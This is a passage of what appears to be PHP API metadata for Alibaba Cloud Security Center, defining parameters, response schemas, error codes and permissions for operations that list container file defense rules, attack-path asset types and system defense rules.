'The IDs of the folders in the resource directory.'."\n", 'type' => 'string', 'example' => 'fd-BwoXuf****,fd-CFamY7****'."\n", 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '7532B7EE-7CE7-5F4D-BF04-B12447DDCAE1', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'ListRdDefaultSyncList', 'summary' => 'Queries the automatic management policies of members that are added to Security Center for multi-account management. The members in the automatic control management directory are automatically added to the member list of Security Center.', 'description' => 'You must use the management account of your resource directory or a delegated administrator account of Security Center to call this operation.'."\n", 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListRdDefaultSyncList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListRdDefaultSyncList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"FolderIds\\": \\"fd-BwoXuf****,fd-CFamY7****\\\\n\\"\\n },\\n \\"RequestId\\": \\"7532B7EE-7CE7-5F4D-BF04-B12447DDCAE1\\"\\n}","type":"json"}]', ], 'ListRuleTargetAll' => [ 'summary' => 'Queries the network objects based on which a specified cluster is protected.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster.'."\n" ."\n" .'> You can call the [DescribeGroupedContainerInstances](~~182997~~) operation to query the IDs of container clusters.'."\n", 'type' => 'string', 'required' => true, 'example' => 'cfa7e2fb8c221483ba59e098c34c6****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '30CBF632-109F-596F-97F2-451C8B2A****', 'title' => ''], 'RuleTargetList' => [ 'description' => 'An array that consists of the network objects.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the network object.'."\n", 'type' => 'object', 'properties' => [ 'TargetId' => ['description' => 'The ID of the network object.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '301944', 'title' => ''], 'TargetName' => ['description' => 'The name of the network object.'."\n", 'type' => 'string', 'example' => 'source-test-obj-xFKcx', 'title' => ''], 'TargetType' => ['description' => 'The type of the object. Valid values:'."\n" ."\n" .'* IMAGE'."\n", 'type' => 'string', 'example' => 'IMAGE', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'ListRuleTargetAll', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListRuleTargetAll'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListRuleTargetAll', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"30CBF632-109F-596F-97F2-451C8B2A****\\",\\n \\"RuleTargetList\\": [\\n {\\n \\"TargetId\\": 301944,\\n \\"TargetName\\": \\"source-test-obj-xFKcx\\",\\n \\"TargetType\\": \\"IMAGE\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListSasContainerWebDefenseRule' => [ 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free'], 'parameters' => [ [ 'name' => 'Criteria', 'in' => 'query', 'schema' => ['description' => 'The conditions for searching assets. This parameter is in JSON format and contains the following fields:'."\n" .'- **name**: The search item.'."\n" .'- **value**: The value of the search item.'."\n" .'- **logicalExp**: The logical relationship among multiple search item values. Valid values:'."\n" .' - **OR**: The search item values are evaluated by using the OR operator.'."\n" .' - **AND**: The search item values are evaluated by using the AND operator.', 'type' => 'string', 'required' => false, 'example' => '[{\\"name\\":\\"ruleName\\",\\"value\\":\\"test-1818\\",\\"logicalExp\\":\\"AND\\"}]', 'title' => ''], ], [ 'name' => 'LogicalExp', 'in' => 'query', 'schema' => ['description' => 'The logical relationship among multiple search conditions. Valid values:'."\n" ."\n" .'- **OR**: The search conditions are evaluated by using the OR operator.'."\n" .'- **AND**: The search conditions are evaluated by using the AND operator.', 'type' => 'string', 'required' => false, 'example' => 'OR', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page in a paged query. Default value: **20**, which indicates that 20 entries are displayed per page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '50', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paged query. Minimum value: 1. Default value: 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. It is used to locate logs and troubleshoot issues.', 'type' => 'string', 'example' => '8C376***AE74FB4', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information of the query result.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '42', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], ], 'title' => '', 'example' => '', ], 'ContainerWebDefenseRuleList' => [ 'description' => 'The list of container file defense rules.', 'type' => 'array', 'items' => [ 'description' => 'The container file defense rule.', 'type' => 'object', 'properties' => [ 'RuleStatus' => ['description' => 'The rule status. Valid values:'."\n" ."\n" .'- **1**: Enabled.'."\n" .'- **0**: Disabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AliUid' => ['description' => 'The user ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '1766185894104675', 'title' => ''], 'ApptotalCount' => ['description' => 'The number of configured applications.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'Id' => ['description' => 'The rule ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '420336648', 'title' => ''], 'RuleName' => ['description' => 'The rule name.', 'type' => 'string', 'example' => 'test2', 'title' => ''], 'GmtCreate' => ['description' => 'The creation time. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1698978109000', 'title' => ''], 'GmtModified' => ['description' => 'The timestamp when the alert event was last modified. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1678852686000', 'title' => ''], 'PathConfDTOList' => [ 'description' => 'The list of rule defense paths.', 'type' => 'array', 'items' => [ 'description' => 'The rule defense path.', 'type' => 'object', 'properties' => [ 'ExcludeFile' => ['description' => 'The excluded file.', 'type' => 'string', 'example' => 'php', 'title' => ''], 'GuardType' => ['description' => 'The defense mode. Valid values:'."\n" .'- **0**: Basic pattern (whitelist).'."\n" .'- **1**: Advanced pattern (blacklist).', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ExcludeFilePath' => ['description' => 'The excluded file path.', 'type' => 'string', 'example' => '/usr/tt', 'title' => ''], 'IncludeFile' => ['description' => 'The included file.', 'type' => 'string', 'example' => '/usr/test', 'title' => ''], 'IncludeFileType' => ['description' => 'The type of the included file.', 'type' => 'string', 'example' => 'php', 'title' => ''], 'DefensePath' => ['description' => 'The defense path.', 'type' => 'string', 'example' => '/usr/test/', 'title' => ''], 'ExcludeFileType' => ['description' => 'The excluded file type.', 'type' => 'string', 'example' => 'jsp', 'title' => ''], 'DefenseMode' => ['description' => 'The action to take. Valid values:'."\n" .'- **block**: Block.'."\n" .'- **audit**: Alert.', 'type' => 'string', 'example' => 'audit', 'title' => ''], 'BackupPath' => ['description' => 'The backup path.', 'type' => 'string', 'example' => '/tmp/test', 'title' => ''], 'ProcessPathList' => [ 'description' => 'The list of whitelisted processes.', 'type' => 'array', 'items' => ['description' => 'The whitelisted process.', 'type' => 'string', 'example' => '/usr/bin/mv', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'List container file defense rules', 'summary' => 'Queries container file defense rules.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListSasContainerWebDefenseRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListSasContainerWebDefenseRule', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"8C376***AE74FB4\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 42,\\n \\"Count\\": 4\\n },\\n \\"ContainerWebDefenseRuleList\\": [\\n {\\n \\"RuleStatus\\": 1,\\n \\"AliUid\\": 1766185894104675,\\n \\"ApptotalCount\\": 10,\\n \\"Id\\": 420336648,\\n \\"RuleName\\": \\"test2\\",\\n \\"GmtCreate\\": 1698978109000,\\n \\"GmtModified\\": 1678852686000,\\n \\"PathConfDTOList\\": [\\n {\\n \\"ExcludeFile\\": \\"php\\",\\n \\"GuardType\\": 0,\\n \\"ExcludeFilePath\\": \\"/usr/tt\\",\\n \\"IncludeFile\\": \\"/usr/test\\",\\n \\"IncludeFileType\\": \\"php\\",\\n \\"DefensePath\\": \\"/usr/test/\\",\\n \\"ExcludeFileType\\": \\"jsp\\",\\n \\"DefenseMode\\": \\"audit\\",\\n \\"BackupPath\\": \\"/tmp/test\\",\\n \\"ProcessPathList\\": [\\n \\"/usr/bin/mv\\"\\n ]\\n }\\n ]\\n }\\n ]\\n}","type":"json"}]', ], 'ListSupportAttackPathAsset' => [ 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '227643', 'abilityTreeNodes' => ['FEATUREsasAIJXMJ'], 'autoTest' => true, 'tenantRelevance' => 'tenant', ], 'parameters' => [ [ 'name' => 'SupportType', 'in' => 'query', 'schema' => ['description' => 'The support type. Valid values:'."\n" .'- **event**: attack path alert event.'."\n" .'- **whitelist**: attack path whitelist.'."\n" .'- **sensitive**: attack path sensitive asset.', 'type' => 'string', 'required' => true, 'example' => 'event', 'title' => ''], ], [ 'name' => 'NodeType', 'in' => 'query', 'schema' => ['description' => 'The node type. Valid values:'."\n" .'- **start**: start node.'."\n" .'- **end**: end node.', 'type' => 'string', 'required' => false, 'example' => 'end', 'title' => ''], ], [ 'name' => 'PathType', 'in' => 'query', 'schema' => ['description' => 'The path type.'."\n" .'> Call [ListAvailableAttackPath](~~ListAvailableAttackPath~~) to query path types.', 'type' => 'string', 'required' => false, 'example' => 'role_escalation', 'title' => ''], ], [ 'name' => 'PathName', 'in' => 'query', 'schema' => ['description' => 'The path name.'."\n" ."\n" .'> Call [ListAvailableAttackPath](~~ListAvailableAttackPath~~) to query path names.', 'type' => 'string', 'required' => false, 'example' => 'ecs_get_credential_by_create_login_profile', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '3956048F-9D73-5EDB-834B-4827BB48***', 'title' => ''], 'AttackPathAssetTypeList' => [ 'description' => 'The list of cloud service asset types for attack paths.', 'type' => 'array', 'items' => [ 'description' => 'The cloud service asset type for attack paths.', 'type' => 'object', 'properties' => [ 'AssetSubType' => ['description' => 'The subtype of the cloud service asset.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'AssetType' => ['description' => 'The type of the cloud service asset.', 'type' => 'integer', 'format' => 'int64', 'example' => '13', 'title' => ''], 'Vendor' => ['description' => 'The vendor of the cloud service asset.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query cloud service asset types supported by attack path analysis', 'summary' => 'Queries the cloud service asset types supported by attack path analysis.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListSupportAttackPathAsset', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3956048F-9D73-5EDB-834B-4827BB48***\\",\\n \\"AttackPathAssetTypeList\\": [\\n {\\n \\"AssetSubType\\": 0,\\n \\"AssetType\\": 13,\\n \\"Vendor\\": 0\\n }\\n ]\\n}","type":"json"}]', ], 'ListSupportObjectSuffix' => [ 'summary' => 'Queries the supported file type suffixes.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The system generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '571B2642-BF51-5BDD-906B-D2340DB9****', 'title' => ''], 'Data' => [ 'description' => 'The returned data.', 'type' => 'array', 'items' => ['description' => 'The file suffix.', 'type' => 'string', 'example' => '.asp', 'title' => ''], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query supported file type suffixes', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListSupportObjectSuffix'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListSupportObjectSuffix', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"571B2642-BF51-5BDD-906B-D2340DB9****\\",\\n \\"Data\\": [\\n \\".asp\\"\\n ]\\n}","type":"json"}]', ], 'ListSystemAggregationRules' => [ 'summary' => 'Retrieves the details of system rule clusters.', 'methods' => ['get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type of the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'The rule name.', 'type' => 'string', 'required' => false, 'example' => '规则****', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'maximum' => '1000', 'minimum' => '1', 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'maximum' => '1000', 'minimum' => '10', 'example' => '20', 'title' => ''], ], [ 'name' => 'RuleTypes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of rule types.', 'type' => 'array', 'items' => ['description' => 'The rule type. Valid values:'."\n" ."\n" .'- **1**: alihips'."\n" .'- **2**: alinet'."\n" .'- **3**: alidetect'."\n" .'- **4**: alisecguard.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'SystemType', 'in' => 'query', 'schema' => ['description' => 'The operating system type. Valid values:'."\n" ."\n" .'- **2**: Windows'."\n" .'- **1**: Linux'."\n" .'- **0**: all.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'AggregationIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The rule cluster ID.', 'type' => 'array', 'items' => ['description' => 'The rule cluster ID.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The query result.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '6800B790-B10A-5C2F-BEB3-F1D5CE61****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information of the query result.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], ], 'title' => '', 'example' => '', ], 'AggregationList' => [ 'description' => 'The result list.', 'type' => 'array', 'items' => [ 'description' => 'The result list.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the rule cluster.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RuleCount' => ['description' => 'The number of rules in the cluster.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Name' => ['description' => 'The name of the rule cluster.', 'type' => 'string', 'example' => '远程控制****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IdempotentParameterMismatch', 'errorMessage' => 'The request uses the same client token as a previous, but non-identical request. Do not reuse a client token with different requests, unless the requests are identical.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve details of system rule clusters', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListSystemAggregationRules'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListSystemAggregationRules', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"6800B790-B10A-5C2F-BEB3-F1D5CE61****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 30\\n },\\n \\"AggregationList\\": [\\n {\\n \\"Id\\": 1,\\n \\"RuleCount\\": 0,\\n \\"Name\\": \\"远程控制****\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListSystemClientRuleTypes' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '79CFF74D-E967-5407-8A78-EE03B925****', 'title' => ''], 'RuleTypes' => [ 'description' => 'The list of rule types.', 'type' => 'array', 'items' => ['description' => 'The rule type. Valid values:'."\n" ."\n" .'- **1**: alihips'."\n" .'- **2**: alinet'."\n" .'- **3**: alidetect'."\n" .'- **4**: alisecguard.', 'type' => 'string', 'example' => '1', 'title' => ''], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query system rule types effective for a user', 'summary' => 'Queries the system rule types.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListSystemClientRuleTypes'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListSystemClientRuleTypes', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"79CFF74D-E967-5407-8A78-EE03B925****\\",\\n \\"RuleTypes\\": [\\n \\"1\\"\\n ]\\n}","type":"json"}]', ], 'ListSystemClientRules' => [ 'summary' => 'Queries system defense rules.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92342', 'abilityTreeNodes' => ['FEATUREsas2XWKXT'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" ."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'The name of the system defense rule.', 'type' => 'string', 'required' => false, 'example' => '规则****', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'maximum' => '1000', 'minimum' => '1', 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'maximum' => '1000', 'minimum' => '10', 'example' => '20', 'title' => ''], ], [ 'name' => 'RuleTypes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The types of the system defense rules.', 'type' => 'array', 'items' => ['description' => 'The type of the system defense rule. Valid values:'."\n" ."\n" .'- **1**: alihips, process-specific defense'."\n" ."\n" .'- **2**: alinet, network-specific defense', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'SystemType', 'in' => 'query', 'schema' => ['description' => 'The type of the OS. Valid values:'."\n" ."\n" .'- **2**: Windows'."\n" ."\n" .'- **1**: Linux'."\n" ."\n" .'- **0**: all types', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'AggregationIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of the aggregation types for rules.', 'type' => 'array', 'items' => ['description' => 'The ID of the aggregation type for the rule.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '38', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'IsContainer', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to query only container images. Valid values:'."\n" ."\n" .'- **0**: no'."\n" ."\n" .'- **1**: yes', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => 'C43CA30F-EF67-51BB-8C95-F31B8303****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '17', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RuleList' => [ 'description' => 'An array that consists of the system defense rules.', 'type' => 'array', 'items' => [ 'description' => 'The information about the system defense rule.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the system defense rule. Valid values:'."\n" ."\n" .'- **online**: enabled'."\n" ."\n" .'- **offline**: disabled', 'type' => 'integer', 'format' => 'int32', 'example' => 'online', 'title' => ''], 'RuleType' => ['description' => 'The type of the system defense rule. Valid values:'."\n" ."\n" .'- **1**: alihips, process-specific defense'."\n" ."\n" .'- **2**: alinet, network-specific defense', 'type' => 'integer', 'format' => 'int32', 'example' => 'alihips', 'title' => ''], 'Platform' => ['description' => 'The type of the OS. Valid values:'."\n" ."\n" .'- **windows**: Windows'."\n" ."\n" .'- **linux**: Linux'."\n" ."\n" .'- **all**: all types', 'type' => 'string', 'example' => 'linux', 'title' => ''], 'SwitchId' => ['description' => 'The switch ID of the system defense rule.', 'type' => 'string', 'example' => 'USER-ENABLE-SWITCH-TYPE_****', 'title' => ''], 'RuleId' => ['description' => 'The ID of the system defense rule.', 'type' => 'integer', 'format' => 'int64', 'example' => '30****', 'title' => ''], 'RuleName' => ['description' => 'The name of the system defense rule.', 'type' => 'string', 'example' => '规则****', 'title' => ''], 'AggregationName' => ['description' => 'The name of the aggregation type for the system defense rule.', 'type' => 'string', 'example' => '初始入口', 'title' => ''], 'Description' => ['description' => 'The description of the system defense rule.', 'type' => 'string', 'example' => '支持告警或拦截存在高危漏洞的镜像在集****', 'title' => ''], 'Policies' => [ 'description' => 'An array that consists of policies.', 'type' => 'array', 'items' => [ 'description' => 'The information about the policy.', 'type' => 'object', 'properties' => [ 'PolicyName' => ['description' => 'The name of the policy.', 'type' => 'string', 'example' => '系统自启动任务****', 'title' => ''], 'PolicyKey' => ['description' => 'The policy key.', 'type' => 'string', 'example' => 'system_auto_****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'SwitchEnable' 